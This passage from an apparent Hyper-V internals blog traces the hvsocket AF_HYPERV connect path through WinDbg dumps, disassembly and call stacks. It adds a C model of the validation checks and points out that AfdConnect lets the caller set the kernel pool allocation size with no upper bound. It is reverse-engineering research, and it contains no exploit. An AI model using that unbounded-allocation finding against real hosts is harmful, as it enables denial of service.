<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {acef5661-84a1-4e44-856b-6245e69f4620}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #4 @ 0xffffaf89adc6a960</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {b1d00d3e-fe10-4570-ad62-7648779d7a1b} – Our service</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #5 @ 0xffffaf89ad8ddc20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {b1d00d3e-fe10-4570-ad62-7648779d7a1c} – Testing service</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #6 @ 0xffffaf89ad90bcd8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {00000000-0000-0000-0000-000000000000}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #7 @ 0xffffaf89adbc1590</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {7fdfd0ea-cea8-4576-92d6-e072ddd2c422}</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inside the function hvsocket!VmbusTlResolvePartitionId is called; its parameter is passed in xmm0, which holds the GUID of the virtual machine obtained with (Get-VM -Name $VMName).Id.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In hvsocket!VmbusTlFindAndReferencePartition the passed GUID is compared with the known GUIDs (child, zero or parent partition). On a match the same GUID is returned in rdi.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rbx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5a0 00000004 00000000 00000002 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5b0 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5c0 00000000 00000000 00060001 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5d0 0a21b5d0 ffff8907 0a21b5d0 ffff8907 ..!.......!.....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5e0 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rbx, [rcx-0D8h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov rax, [rbx+0E8h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GUID @rbx+e8h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd} - </span><span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GUID @rbx+e8h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {a42e7cda-d03f-480c-9cc2-a4de20abb878} - </span><span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the function does not find the GUID, it returns 0, which leads to error code 0xC0000141 being returned:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!error 0C0000141</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Error code: (NTSTATUS) 0xc0000141 (3221225793) - The address handle given to the transport was invalid.</span></div>
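<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The checks traced so far (the AfdConnect length arithmetic above, then VmbusTlValidateSockAddress and VmbusTlFindAndReferencePartition) fit into a small model. The C program below is an added example, not code from this post and not Windows code: it lays out SOCKADDR_HV to the 0x24 bytes seen in the debugger, reproduces the InputBufferLength minus 0xC computation with no upper bound, and models the family, service and partition checks with the GUIDs and the 0xC0000141 status shown above. The AFD_CONNECT_HDR_LEN name, the STATUS_INVALID_PARAMETER rejections, the in-memory REGISTERED_SERVICES array (a constructed stand-in for the list hvsocket builds from the GuestCommunicationServices registry key) and the run_scenario helper are assumptions of the example.</span></div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added model of the AF_HYPERV connect validation path; not Windows code. */
#define AF_HYPERV                0x22
#define AFD_STANDARD_ADDR_LEN    0x1C        /* afd!AfdStandardAddressLength */
#define AFD_CONNECT_HDR_LEN      0x0C        /* assumed: bytes before the sockaddr in the input */
#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du /* assumed code for family/length/service rejection */
#define STATUS_INVALID_ADDRESS   0xC0000141u /* the !error result seen in the debugger */

typedef struct { uint32_t Data1; uint16_t Data2; uint16_t Data3; uint8_t Data4[8]; } GUID;

/* 2 + 2 + 16 + 16 = 0x24 bytes, the pool size AfdConnect allocates for our address */
typedef struct {
    uint16_t Family;      /* AF_HYPERV */
    uint16_t Reserved;
    GUID     VmId;        /* partition id, e.g. HV_GUID_CHILDREN or (Get-VM -Name ...).Id */
    GUID     ServiceId;   /* registered hvsocket service id */
} SOCKADDR_HV;
_Static_assert(sizeof(SOCKADDR_HV) == 0x24, "SOCKADDR_HV must be 0x24 bytes");

/* Well-known partition ids compared in hvsocket!VmbusTlFindAndReferencePartition */
static const GUID HV_GUID_ZERO     = {0};
static const GUID HV_GUID_CHILDREN = {0x90db8b89, 0x0d35, 0x4f79, {0x8c,0xe9,0x49,0xea,0x0a,0xc8,0xb7,0xcd}};
static const GUID HV_GUID_PARENT   = {0xa42e7cda, 0xd03f, 0x480c, {0x9c,0xc2,0xa4,0xde,0x20,0xab,0xb8,0x78}};

/* Constructed stand-in for the service list hvsocket builds from the registry */
static const GUID REGISTERED_SERVICES[] = {
    {0xb1d00d3e, 0xfe10, 0x4570, {0xad,0x62,0x76,0x48,0x77,0x9d,0x7a,0x1b}}, /* our service */
    {0xb1d00d3e, 0xfe10, 0x4570, {0xad,0x62,0x76,0x48,0x77,0x9d,0x7a,0x1c}}, /* testing service */
};
#define SVC_OURS (&REGISTERED_SERVICES[0])
#define SVC_TEST (&REGISTERED_SERVICES[1])
#define N_SERVICES (sizeof REGISTERED_SERVICES / sizeof REGISTERED_SERVICES[0])

static int guid_eq(const GUID *a, const GUID *b) { return memcmp(a, b, sizeof *a) == 0; }

/* AfdConnect length handling: the address length is InputBufferLength - 0xC. If it exceeds
 * AfdStandardAddressLength that many bytes go to ExAllocatePoolWithTagPriority, returned
 * here; 0 means the standard inline buffer suffices. There is no upper bound, as observed. */
size_t afd_connect_pool_size(size_t input_len) {
    if (input_len < AFD_CONNECT_HDR_LEN) return 0;   /* assumed: too short to hold the header */
    size_t addr_len = input_len - AFD_CONNECT_HDR_LEN;
    return addr_len > AFD_STANDARD_ADDR_LEN ? addr_len : 0;
}

/* hvsocket!VmbusTlValidateSockAddress: family must be 0x22 and the service must be registered */
uint32_t vmbus_validate_sockaddr(const SOCKADDR_HV *sa, const GUID *services, size_t n) {
    if (sa->Family != AF_HYPERV) return STATUS_INVALID_PARAMETER;
    for (size_t i = 0; i < n; i++)
        if (guid_eq(&sa->ServiceId, &services[i])) return STATUS_SUCCESS;
    return STATUS_INVALID_PARAMETER;
}

/* hvsocket!VmbusTlFindAndReferencePartition: accept the well-known ids or one running VM
 * id (running_vm may be NULL); anything else fails with 0xC0000141 */
uint32_t vmbus_find_partition(const GUID *vm_id, const GUID *running_vm) {
    if (guid_eq(vm_id, &HV_GUID_ZERO) || guid_eq(vm_id, &HV_GUID_CHILDREN) ||
        guid_eq(vm_id, &HV_GUID_PARENT) || (running_vm && guid_eq(vm_id, running_vm)))
        return STATUS_SUCCESS;
    return STATUS_INVALID_ADDRESS;
}

/* The whole path for one connect() input buffer: returns the NTSTATUS the caller would see */
uint32_t hv_connect_model(const uint8_t *input, size_t input_len,
                          const GUID *services, size_t n, const GUID *running_vm) {
    SOCKADDR_HV sa;
    size_t addr_len = afd_connect_pool_size(input_len);
    if (addr_len < sizeof sa) return STATUS_INVALID_PARAMETER;   /* assumed rejection */
    memcpy(&sa, input + AFD_CONNECT_HDR_LEN, sizeof sa);
    uint32_t st = vmbus_validate_sockaddr(&sa, services, n);
    if (st != STATUS_SUCCESS) return st;
    return vmbus_find_partition(&sa.VmId, running_vm);
}

/* Builds a 0x30-byte input (0xC header + SOCKADDR_HV) and runs it through the model */
uint32_t run_scenario(uint16_t family, const GUID *vm_id, const GUID *svc) {
    uint8_t input[AFD_CONNECT_HDR_LEN + sizeof(SOCKADDR_HV)];
    SOCKADDR_HV sa;
    memset(input, 0, sizeof input);
    memset(&sa, 0, sizeof sa);
    sa.Family = family;
    sa.VmId = *vm_id;
    sa.ServiceId = *svc;
    memcpy(input + AFD_CONNECT_HDR_LEN, &sa, sizeof sa);
    return hv_connect_model(input, sizeof input, REGISTERED_SERVICES, N_SERVICES, NULL);
}

int main(void) {
    printf("sizeof(SOCKADDR_HV)           = 0x%zx\n", sizeof(SOCKADDR_HV));
    printf("pool for 0x30-byte input      = 0x%zx\n", afd_connect_pool_size(0x30));
    printf("pool for 1 GiB input          = 0x%zx (no upper bound)\n", afd_connect_pool_size((size_t)1 << 30));
    printf("children partition, our svc   = 0x%08x\n", run_scenario(AF_HYPERV, &HV_GUID_CHILDREN, SVC_OURS));
    printf("unknown partition id          = 0x%08x\n", run_scenario(AF_HYPERV, SVC_OURS, SVC_OURS));
    return 0;
}
```

<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 1 GiB case is the point worth keeping in mind from the AfdConnect trace: the only check on the address length is the lower bound against AfdStandardAddressLength, so the allocation size is entirely caller-controlled.</span></div>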
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next the chain hvsocket!VmbusTlCreateConnection -&gt; hvsocket!VmbusTlCreateEndpoint -&gt; hvsocket!VmbusTlCreateObjectFromLookasideList is called.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before function call:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem @r8 -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Mex External 3.0.0.7172 Loaded!</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffdc00c33555a8</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 1 items.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After function call:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem ffffdc00c33555a8 -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffdc00c33555a8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e75920830</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 2 items.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the work queue hvsocket!VmbusTlEndpointActionWorkQueueRoutine is initialized (through netio!NetioInitializeWorkQueue) and we return from hvsocket!VmbusTlCreateEndpoint. Next two DPCs are initialized: hvsocket!VmbusTlConnectTimeoutDpc and hvsocket!VmbusTlOppositeEndpointDisconnectTimeoutDpc (the timer is initialized as well, but KeSetTimer is not called). We return from hvsocket!VmbusTlCreateConnection into hvsocket!VmbusTlProviderConnect.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next hvsocket!VmbusTlContainerGetVmId is called (covered in detail in the Bind section earlier). Then hvsocket!VmbusTlAssociateConnectionToPartition is called with these parameters:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r xmm1:ud</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xmm1=78b8ab20 dea4c29c 480cd03f a42e7cda</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r xmm0:ud</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xmm0=cdb7c80a ea49e98c 4f790d35 90db8b89</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlSetupConnection is called (its 2nd parameter is the LIST_ENTRY element created by hvsocket!VmbusTlCreateObjectFromLookasideList), and from it hvsocket!VmbusTlSetObjectCancellable, which adds one element to the AVL table created earlier (the table was empty before that).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next comes hvsocket!VmbusTlXPartChildSetupConnection, which calls hvsocket!VmbusTlSetupConnectionId (in our case it worked with HV_GUID_ZERO; if the passed GUID differs, nt!ExUuidCreate is called and then hvsocket!VmbusTlSetEndpointId), and then vmbus!ChTlConnectRequest, whose 3rd parameter is the GUID of our service:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID @r8 -r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (*((_GUID *)0xffffdc00c3355550)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID] </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(if this function returns 0, error code 0xC000009A is returned further up)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next vmbus!ChAllocateSendMessageSized -&gt; vmbus!XPartAllocateSendMessage are called (this comes down to an nt!ExAllocatePoolWithTag call and zeroing of the allocated memory), and the familiar vmbus work described in the previous article begins (Hyper-V Internals - http://hvinternals.blogspot.com/2015/10/hyper-v-internals.html). If vmbus!ChAllocateSendMessageSized executed successfully</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!ChAllocateSendMessageSized</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!ChTlConnectRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlXPartChildSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdConnect</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and the pool was allocated, vmbus!ChSendMessage is called</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx - the 2nd vmbus!ChSendMessage parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e`758d8ba8 00000015 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e`758d8bb8 00000000 00000000 b1d00d3e 4570fe10 ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e`758d8bc8 487662ad 1b7a9d77</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
